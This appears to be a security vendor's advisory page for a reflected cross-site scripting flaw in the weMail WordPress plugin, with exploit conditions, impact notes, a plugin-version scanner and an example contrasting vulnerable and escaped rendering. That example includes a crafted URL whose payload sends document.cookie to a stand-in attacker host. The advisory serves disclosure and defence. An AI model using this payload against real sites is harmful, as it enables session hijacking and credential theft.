Severity: HIGH | CVE-2026-8089 | CNA: WPScan

CVE-2026-8089: weMail < 2.1.3 - Reflected Cross-Site Scripting

The weMail: Email Marketing, Email Automation, Newsletters, Subscribers & Email Optins for WooCommerce WordPress plugin before 2.1.3 does not properly escape a user-supplied parameter before reflecting it into an HTML attribute on a non-nonce-protected AJAX response, allowing unauthenticated attackers to deliver Reflected Cross-Site Scripting against any authenticated user (including administrators) via a crafted URL.
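The bug class described above is reflection into an HTML attribute without attribute-context escaping. The following added example (not weMail's code; the AJAX action name, the `ref` parameter and the `<input>` fragment are hypothetical) renders an attacker-supplied value both the vulnerable way and with an `esc_attr()`-style encoding, then re-parses the result to show what a browser would see: in the unescaped case the value closes the attribute and adds an event handler, in the escaped case the whole payload stays inside the one attribute it was meant to fill.

```python
"""Attribute-context reflected XSS: vulnerable rendering beside the escaped form.

Added illustration, not code from the weMail plugin. The admin-ajax action,
the 'ref' parameter and the <input> fragment are assumed for the example;
only the bug class (unescaped reflection into an HTML attribute) matches the
advisory text.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed attacker URL. The payload closes the value="..." attribute,
# adds an onfocus handler and an autofocus attribute so it fires on load.
ATTACK_URL = (
    "https://shop.example/wp-admin/admin-ajax.php?action=wemail_demo"
    '&ref=x"%20onfocus="fetch(`//evil.example/?c=`%2Bdocument.cookie)"%20autofocus="'
)


def param_from_url(url: str, name: str) -> str:
    """Extract one query parameter the way the server would see it (URL-decoded)."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(value: str) -> str:
    """The bug class: untrusted value dropped straight into an attribute."""
    return f'<input type="hidden" name="ref" value="{value}">'


def esc_attr(value: str) -> str:
    """Equivalent of WordPress esc_attr(): encode & < > " ' for attribute context."""
    return escape(value, quote=True)


def render_fixed(value: str) -> str:
    """Hardened form: same template, value escaped for the attribute context."""
    return f'<input type="hidden" name="ref" value="{esc_attr(value)}">'


class AttrCollector(HTMLParser):
    """Record the attributes a browser would actually assign to the <input>."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def parsed_attrs(html: str) -> dict:
    parser = AttrCollector()
    parser.feed(html)
    return parser.attrs


def has_event_handler(html: str) -> bool:
    """True if the rendered markup grew an on* attribute the template never wrote."""
    return any(k.startswith("on") for k in parsed_attrs(html))


if __name__ == "__main__":
    ref = param_from_url(ATTACK_URL, "ref")
    for label, html in (("vulnerable", render_vulnerable(ref)), ("fixed", render_fixed(ref))):
        print(f"{label}: {html}")
        print(f"  attributes seen by the browser: {parsed_attrs(html)}")
        print(f"  event handler injected: {has_event_handler(html)}")
```

Two points the output makes concrete: escaping is the fix, because the escaped value round-trips through the parser as a single `value` attribute equal to the raw input; and the missing nonce is what lets an unauthenticated attacker pre-build the URL. A WordPress nonce is per-user and time-limited, so a `check_ajax_referer()` guard would stop an attacker from crafting a link in advance, but it is not a substitute for escaping the output, since the same reflection would still be exploitable by anyone who can obtain a valid nonce.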

Metrics

CVSS v3.1
7.1
Severity
HIGH
Fixed in
2.1.3
Affected Products
1


HarborGuard Analysis

Synopsis

Reflected Cross-Site Scripting (XSS) affects the weMail WordPress plugin (Email Marketing, Email Automation, Newsletters, Subscribers & Email Optins for WooCommerce) in all versions before 2.1.3. The vulnerability is reachable over the network with no authentication required on the attacker's side, but requires a victim who is already logged in to click or load a crafted URL. Successful exploitation injects attacker-controlled script into the victim's browser session, enabling session hijacking, credential theft, or unauthorized actions performed as the victim, including administrator-level operations. A patched-image rebuild at version 2.1.3 is available on HarborGuard for environments running an affected version.

HarborGuard Coverage

Detection

Detection of CVE-2026-8089 is available across every HarborGuard environment: the CVE is ingested from upstream feeds (including WPScan) within minutes of publication and matched against customer images, including custom-built WordPress images that bundle the weMail plugin. Any image whose embedded plugin version falls below 2.1.3 is flagged automatically.
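The version match described above can be reproduced locally against an unpacked image or a mounted `wp-content/plugins` directory. The following added example (not HarborGuard's scanner) reads each plugin's WordPress header block, selects the plugin by its `Plugin Name:` header rather than by directory name, and flags anything below 2.1.3 or with no parseable version. The directory names `wemail` and `wemail-upgraded` and the file contents in the fixture are constructed for the demo.

```python
"""Flag WordPress plugin trees that bundle weMail below the fixed version 2.1.3.

Added example, not HarborGuard's detection code. The plugin directory and
file names in the fixture are assumed; the match is driven by the
'Plugin Name:' header, so a renamed plugin directory is still found.
"""
import re
import shutil
import tempfile
from pathlib import Path

FIXED_VERSION = "2.1.3"
# Header lines look like " * Plugin Name: ..." or "Version: ..." inside the
# leading comment block; WordPress itself reads only the first 8 KiB.
HEADER_RE = re.compile(r"^\s*\*?\s*(Plugin Name|Version):\s*(.+?)\s*$", re.M)


def parse_plugin_header(text: str) -> dict:
    return dict(HEADER_RE.findall(text[:8192]))


def version_key(v: str) -> tuple:
    """Sort key for dotted versions; any non-numeric suffix counts as pre-release.

    '2.1.3-beta' < '2.1.3' < '2.1.3.0' < '2.10.0', which is what we need when
    deciding whether a build predates the fix.
    """
    m = re.match(r"\s*(\d+(?:\.\d+)*)(.*)", v)
    if not m:
        raise ValueError(f"unparseable version: {v!r}")
    nums = tuple(int(x) for x in m.group(1).split("."))
    return (nums, 0 if m.group(2).strip() else 1)


def scan_plugins(plugins_dir: Path) -> list:
    """Return one finding per weMail main file found under plugins_dir."""
    findings = []
    for php in sorted(plugins_dir.glob("*/*.php")):
        header = parse_plugin_header(php.read_text(errors="replace"))
        if "wemail" not in header.get("Plugin Name", "").lower():
            continue
        version = header.get("Version")
        try:
            # Advisory range is '< 2.1.3 (from 0)'; an unreadable version is
            # treated as vulnerable because it cannot prove the fix is present.
            vulnerable = version is None or version_key(version) < version_key(FIXED_VERSION)
        except ValueError:
            vulnerable = True
        findings.append({
            "path": php.relative_to(plugins_dir).as_posix(),
            "version": version,
            "vulnerable": vulnerable,
        })
    return findings


def demo() -> list:
    """Build a constructed plugin tree, scan it, clean up, return the findings."""
    root = Path(tempfile.mkdtemp())
    fixture = {
        "wemail/wemail.php": "2.0.9",            # affected build
        "wemail-upgraded/wemail.php": "2.1.3",   # fixed build, renamed directory
    }
    try:
        for rel, ver in fixture.items():
            f = root / rel
            f.parent.mkdir(parents=True)
            f.write_text(
                "<?php\n/**\n"
                " * Plugin Name: weMail: Email Marketing, Email Automation, Newsletters, "
                "Subscribers & Email Optins for WooCommerce\n"
                f" * Version: {ver}\n */\n"
            )
        other = root / "hello-dolly" / "hello.php"
        other.parent.mkdir()
        other.write_text("<?php\n/**\n * Plugin Name: Hello Dolly\n * Version: 1.7.2\n */\n")
        return scan_plugins(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The header check tells you what is on disk, not what is deployed: a distribution that backported the fix without bumping the version would still be flagged, and a site that removed the plugin directory but left the option rows in the database is not affected. Treat the output as a candidate list to confirm against the running site.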

Status: Available
Triage

HarborGuard scores this finding at CVSS 7.1 HIGH and weights it against each environment's compliance policy to determine urgency and routing. Alerts are directed to the appropriate team inbox within each customer org based on configured ownership rules, so the right people receive the finding without manual triage steps.

Status: Available
Patch

A patched-image rebuild pinned to weMail 2.1.3 becomes available on HarborGuard once the fix version is confirmed, which it is for this CVE. For customers with auto-remediation enabled, HarborGuard triggers a rebuild, runs regression tests against the updated image, and opens a pull request against affected workloads automatically.

Status: Available

Exploit Conditions

  • Network reachability: Required

    The attacker delivers the crafted URL over the network, so the vulnerable AJAX endpoint must be reachable from the internet or from a network path the victim's browser can reach.

  • Authentication: Not required

    No account or credential is needed on the attacker's side; the endpoint is exposed to unauthenticated requests and reflects the malicious parameter without a nonce or privilege check.

  • Victim interaction: Required

    A logged-in user (including an administrator) must follow or load the attacker-crafted URL for the injected script to execute in their browser session.

  • Attack complexity: Low (CVSS AC:L)

    The exploit is reliable once the victim loads the URL; no race condition or special environmental factor is required.

Blast Radius

  • Attacker-controlled JavaScript executes in the victim's authenticated browser session, enabling theft of session cookies or authentication tokens.
  • The injected script can read and exfiltrate page content visible to the victim, including sensitive administrative data or subscriber records managed through weMail.
  • Because the attack works against administrators, the script can issue privileged WordPress actions on the victim's behalf, such as creating rogue admin accounts or modifying plugin settings.
  • Integrity of displayed page content is compromised for the duration of the attack, and availability of the victim's session may be disrupted if the payload redirects or locks the user out.

How HarborGuard Handles This

Available on HarborGuard: detection of this CVE is matched against every customer image within minutes of publication, with no manual configuration required to cover custom-built WordPress images that bundle weMail. For environments running a version below 2.1.3, a rebuilt image at the patched version is available. Where compliance policy permits auto-remediation, HarborGuard performs the rebuild, executes a regression-test run against the updated image, and opens a pull request against affected workloads; median time from CVE publication to merged patch PR for high-severity issues is around 90 minutes for environments with auto-remediation enabled. For environments where auto-remediation is not enabled, the finding is routed to the configured owner inbox with CVSS 7.1 HIGH scoring and policy weighting applied, so teams can prioritize and act on the upgrade to 2.1.3 manually.


Fix available: 2.1.3

Affected packages
  • Unknown / weMail: Email Marketing, Email Automation, Newsletters, Subscribers & Email Optins for WooCommerce
    < 2.1.3 (from 0)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L